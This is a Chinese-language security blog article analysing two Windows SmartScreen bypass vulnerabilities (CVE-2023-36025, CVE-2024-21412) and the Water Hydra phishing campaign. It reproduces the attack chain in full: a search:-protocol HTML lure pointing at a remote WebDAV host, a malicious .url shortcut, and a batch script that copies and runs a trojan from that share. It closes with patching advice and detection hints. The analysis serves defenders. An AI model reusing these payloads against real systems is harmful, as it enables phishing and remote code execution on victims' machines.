前言
2024年2月微软发布了一个Internet快捷方式文件安全功能绕过漏洞(CVE-2024-21412),互联网上未经身份验证的攻击者可以向目标用户发送旨在绕过显示的安全检查的特制文件,诱导用户点击实现恶意代码执行。在说这个漏洞之前,先看一个之前的Windows SmartScreen安全功能绕过漏洞。
CVE-2023-36025
CVE-2023-36025是微软于11月补丁日发布的安全更新中修复Windows SmartScreen安全功能绕过漏洞。攻击者可以通过诱导用户点击特制的URL文件,对目标系统进行攻击。成功利用该漏洞的攻击者能够绕过Windows Defender SmartScreen检查及其相关提示。该漏洞的攻击复杂性较低,可创建并诱导用户点击恶意设计的 Internet 快捷方式文件 (.URL) 或指向此类文件的超链接来利用该漏洞,无需特殊权限即可通过互联网进行利用。
双击url文件,test.exe被下载执行。正常情况下用户双击来自网络的可执行文件的时候,会触发Windows Defender SmartScreen的检查。然而,当点击恶意url文件时,windows会先解压远程zip文件并放入临时目录,然后执行cmd文件,没有触发相关的安全警告。
CVE-2024-21412
在攻击链中,Water Hydra在外汇交易论坛和股票交易Telegram频道上部署了鱼叉式网络钓鱼活动,利用各种社会工程技术(例如发布请求或提供交易的消息),引诱交易者感染DarkMe恶意软件。攻击者会诱导用户进入一个受感染的俄罗斯加密货币信息网站,该网页上有一个指向股票图表(实际上是远控木马)的URL,而受害者往往会被引诱点击该链接。一旦点击了该连接并在本地资源管理器打开,很容易被诱导点击伪装成图片的远程恶意URL文件,从而感染木马。
当用户选择了打开后,在这里攻击者滥用了Microsoft Windows 搜索的应用程序协议来引诱受害者点击恶意Internet快捷方式(.url)文件。search:协议调用Windows桌面搜索应用程序。在这里利用search:协议和精心设计的高级查询语法 (AQS) 查询来自定义Windows资源管理器视图的外观,以欺骗受害者。
<! DOCTYPE html><htm1><head>Photo Download</head><body><p><a href="search:query=photo_2024-02-28.jpg&crumb=location:\101.33.117.154@8077webdavimages&displayname=Downloads">photo_2024-02-28.jpg</a></p></body></html>
上图显示了包含恶意搜索的HTML URL链接。search:应用程序协议来执行对photo_2024-02-28.jpg 的搜索,crumb 参数将搜索范围限制为恶意 WebDAV 共享,而DisplayName 元素欺骗用户使其认为这是本地下载文件夹。
这会导致用户相信来自恶意WebDAV服务器的文件已被下载,从而诱骗他们点击伪造的JPEG图像的恶意文件。由于Microsoft Windows无论是否设置显示扩展名,都会自动隐藏.url扩展名,而且.url文件的图标可以进行设置,这使得文件看起来更像是JPEG图像文件(实际上是photo_2024-02-28.jpg.url),很容易诱导点击。而CVE-2024-21412 的利用方式就隐藏在这个url文件中。
CVE-2024-21412主要利用的也是互联网快捷方式文件,可以理解为CVE-2023-36025修复的绕过。这些.url文件属于INI配置文件,采用指向URL的"URL="参数。在.url文件中,可以使用imagress.dll(Windows图像资源)图标库,使用IconFile =和IconIndex=参数将默认的互联网快捷方式文件更改为图像图标,以进一步欺骗用户。
文件中的的URL参数指向托管在WebDAV服务器上的另一个Internet快捷方式文件。而test.url文件中是先前修补的Microsoft Defender SmartScreen绕过漏洞(CVE-2023-36025)的利用逻辑:
[InternetShortcut]URL=file://10.xx.xx.xx@8077/webdav/cxm.zip/cxm.cmdIDList=HotKey=0[{000214AO-0000-0000-c000-000000000046}]Prop3=19,9
cmd文件内容如下,从远程WebDAV服务器copy木马文件并执行:
@echo offif not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exitcopy /b \10[email protected] %TEMP%test.execd %TEMP%cmd /c test.exeexit
这段批处理脚本还有一个技巧,第二行的作用是检测是否设置了 IS_MINIMIZED 环境变量。如果没有,就会最小化启动同一个批处理文件的新实例,并在新窗口中执行其余的脚本,然后关闭原始的命令提示符窗口。这样,用户看到的批处理文件执行效果是它以最小化的状态在执行。
通过双击第一个伪装成JPEG的互联网快捷方式文件,就可以利用CVE-2024-21412绕过Microsoft Defender SmartScreen,并开始控制受害者机器。
总结来说就是通过精心设计的Windows资源管理器视图,能够诱使受害者点击CVE-2024-21412漏洞利用的远程.url文件,该漏洞导致在不提醒用户的情况下执行来自不受信任来源的代码,依赖于Windows无法正确应用MotW并导致缺SmartScreen保护。绕过SmartScreen后,第二个.url快捷方式会运行嵌入在攻击者WebDAV共享的ZIP文件中的批处理文件,批处理脚本从恶意WebDAV共享复制并执行木马程序。整个攻击在用户不知情和SmartScreen保护的情况下运行。
攻击链完成后,用户机器还会下载真实的JPEG文件,该文件与利用CVE-2024-21412漏洞的JPEG文件同名。该文件会打开来欺骗受害者,让用户认为自己已经打开了从伪造的下载文件夹中看到的JPEG文件,并对木马感染毫不知情。
笔者认为这个漏洞虽然看起来比较鸡肋,看似就是绕过了一个安全提醒,但其实伪装性非常强,可以伪造一个下载目录资源管理器,并且无论文件查看如何设置,.url文件都会自动隐藏后缀,还可以通过ini配置来设置图标,非常容易诱导人去点击(其实安全意识差的人也不差SmartScreen这一层安全提醒= =),结合起来钓鱼还是比较容易。
防御措施
·及时更新微软2月最新补丁;
svchost.exe --> rundll32.exe C:Windowssystem32davclnt.dll,DavSetCookie 10.xx.xx.xx@8077 http://10.xx.xx.xx:8077/WebDAV/cxm.cmdexplorer.exe --> C:Windowssystem32cmd.exe /K "\[email protected]"
各位佬自行参考写规则吧。
注:本文内容仅用于研究学习,不可用于网络攻击等非法行为,否则造成的后果均与本文作者和本公众号无关,维护网络安全人人有责~
原文始发于微信公众号(红蓝攻防研究实验室):Windows SmartScreen安全功能绕过漏洞(含CVE-2024-21412复现)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论